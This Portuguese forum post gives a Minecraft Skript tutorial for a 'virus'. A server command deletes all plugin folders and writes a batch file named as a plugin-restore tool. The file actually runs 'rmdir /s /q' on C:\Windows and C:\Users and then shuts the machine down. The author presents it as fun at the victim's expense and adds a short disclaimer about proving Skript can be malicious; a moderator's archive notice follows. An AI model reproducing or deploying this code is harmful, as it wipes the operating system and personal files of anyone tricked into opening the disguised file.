danielzinh Postado Julho 22, 2020 Denunciar Compartilhar Postado Julho 22, 2020 Olá, ontem criei um tópico sobre vírus em Skript, que ficou bem interessante até para quem não entende de Skript, então resolvi criar um "episódio 2" ou uma continuação, dessa vez, uma que pode fazer um estrago muito maior que o antigo. Vamos pegar uma base do Skript anterior, nosso objetivo hoje é deletar a pasta Windows do computador da nossa vítima, que no caso, sou eu mesmo kkkkk vamos lá Eu andei pensando em como fazer isso, já que não posso modificar o arquivo start.bat, somente arquivos dentro da pasta /plugins/, então, vou deletar todas as pastas novamente, e criar um arquivo .bat chamado "RestaurarArquivos.bat" que supostamente vai restaurar os arquivos, porém, vai destruir o seu computador muwhahahaha Para fazermos esse código, precisamos enter um pouco mais da linguagem do batch file, famoso .bat que usamos muito para ligar nossos servidores, vamos então criar um código que possa deletar a pasta windows. rmdir /s /q c:\windows isso deleta a pasta Windows do seu computador, é só criar em um arquivo .bat, executar, e simplesmente deletou Então... agora, chegamos ao código final do arquivo .bat: rmdir /s /q c:\Windows ATENÇÃO: NÃO EXECUTE ESSE ARQUIVO .BAT COMO ADMINISTRADOR, JÁ ERA SE FIZER ISSO, NÃO TEM VOLTA. Pronto, arquivo .bat com VÍRUS foi feito, agora, vamos fazer o skript deletar todos os plugins e criar o nosso arquivo AbraParaRestaurarPlugins.bat muwhahahah! Vamos direto ao ponto, esse é o código final no skript (needs skutilities): command /apagar: trigger: set {lista::*} to list of plugins loop {lista::*}: delete directory "plugins/%loop-value%" create file "plugins/AbraParaRestaurarPlugins.bat" write file "rmdir /s /q c:\Windows" to "plugins/AbraParaRestaurarPlugins.bat" E quando o comando for executado (/apagar) vai apagar todas as pastas dos plugins e criar um arquivo .bat com o nome "AbraParaRestaurarPlugins.bat", a vítima vai lá secona para tentar restaurar os plugins e vai perder junto a pasta do windows kkkkkkkkkkkkkkkkkkkkkkk Vamos deixar mais divertido, vamos deixar o PC do cara adjiwadjaij, agora, com o .bat não temos limitações! kkkkkkkkkkkk command /apagar: trigger: set {lista::*} to list of plugins loop {lista::*}: delete directory "plugins/%loop-value%" create file "plugins/AbraParaRestaurarPlugins.bat" write file "rmdir /s /q c:\Windows" to "plugins/AbraParaRestaurarPlugins.bat" write file "shutdown -t 0" to "plugins/AbraParaRestaurarPlugins.bat" acho que já estragamos o PC, mas seria melhor deletar também seus arquivos pessoais, já que a pasta Windows só ferraria o sistema, mas queremos ferrar o carinha também, eu acho kkkkkk Todos os dados pessoais ficam em C:\Users\, então vamos deletar TUDO dessa pasta E a pasta junto. e pronto, vírus feito, mas, eu não considero esse vírus muito forte pois só as pessoas mais burras abririam um .bat assim que acabou de aparecer misteriosamente na sua pasta de plugins, mas valeu a pena testar todas essas coisas hahahahah command /apagar: trigger: set {lista::*} to list of plugins loop {lista::*}: delete directory "plugins/%loop-value%" create file "plugins/AbraParaRestaurarPlugins.bat" write file "rmdir /s /q c:\Windows" to "plugins/AbraParaRestaurarPlugins.bat" write file "rmdir /s /q c:\Users" to "plugins/AbraParaRestaurarPlugins.bat" write file "shutdown -t 0" to "plugins/AbraParaRestaurarPlugins.bat" QUAL FOI A INTENÇÃO DESSE PROJETO?: PROVAR QUE O SKRIPT SIM PODE SER MALICIOSO TODO OS FEITOS NESSE TÓPICO FORAM EM AMBIENTES CONTROLADOS SEM NENHUMA INTENÇÃO DE PREJUDICAR NINGUÉM, NÃO ME RESPONSABILIZO PELAS MERDAS QUE TU FAZER COM ESSE CÓDIGO. e claro, foi tudo com boas intenções de alertar vocês ? obrigado, obrigado. 1 Link para o comentário Compartilhar em outros sites More sharing options...
LymeeFairy Postado Setembro 20, 2024 Denunciar Compartilhar Postado Setembro 20, 2024 ANÁLISE DE CONTEÚDO DESATUALIZADO Este tópico foi automaticamente arquivado devido à falta de atualizações recentes ou ao fato de o conteúdo estar desatualizado em relação às práticas ou informações atuais. Para manter a qualidade e relevância das discussões na comunidade, tópicos sem novas atualizações ou com informações obsoletas são periodicamente arquivados. Se houver novos dados ou atualizações pertinentes ao tema, sinta-se à vontade para criar um novo tópico com as informações atualizadas. Equipe de Moderação Gamer's Board Link para o comentário Compartilhar em outros sites More sharing options...
Posts Recomendados